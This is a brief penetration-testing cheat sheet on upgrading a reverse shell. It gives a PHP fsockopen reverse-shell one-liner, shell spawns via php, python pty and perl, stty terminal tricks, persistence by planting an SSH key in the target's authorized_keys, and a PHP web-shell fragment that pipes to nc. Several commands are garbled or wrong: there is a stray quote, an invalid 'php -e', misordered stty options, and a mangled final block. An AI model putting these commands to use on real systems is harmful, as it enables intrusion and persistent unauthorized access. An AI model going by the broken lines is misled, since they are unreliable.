# Upgrade Reverse Shell ## Via interpreter ### PHP * reverse shell ```php php -r '$sock=fsockopen("", );exec("/bin/sh -i <&3 >&3 2>&3");' ``` ```php php -r 'exec ("/bin/bash")";' ``` * Sometimes even ```php php -e 'exec "/bin/bash";' ``` ### Python ```python python -c 'import pty; pty.spawn("/bin/bash")' ``` ### Perl ```perl perl -e 'exec "/bin/sh";' ``` ## Next 1. `ctrl` + `z` 2. `stty echo -raw` 3. `fg` 4. `export TERM=xterm` ## Via SSH * `ssh-keygen` * copy priv key and `chmod 600` * `cat id_rsa.pub > authorized_keys` on target ## As Code ### PHP ```sh &1|nc

> /tmp/f') ?> ```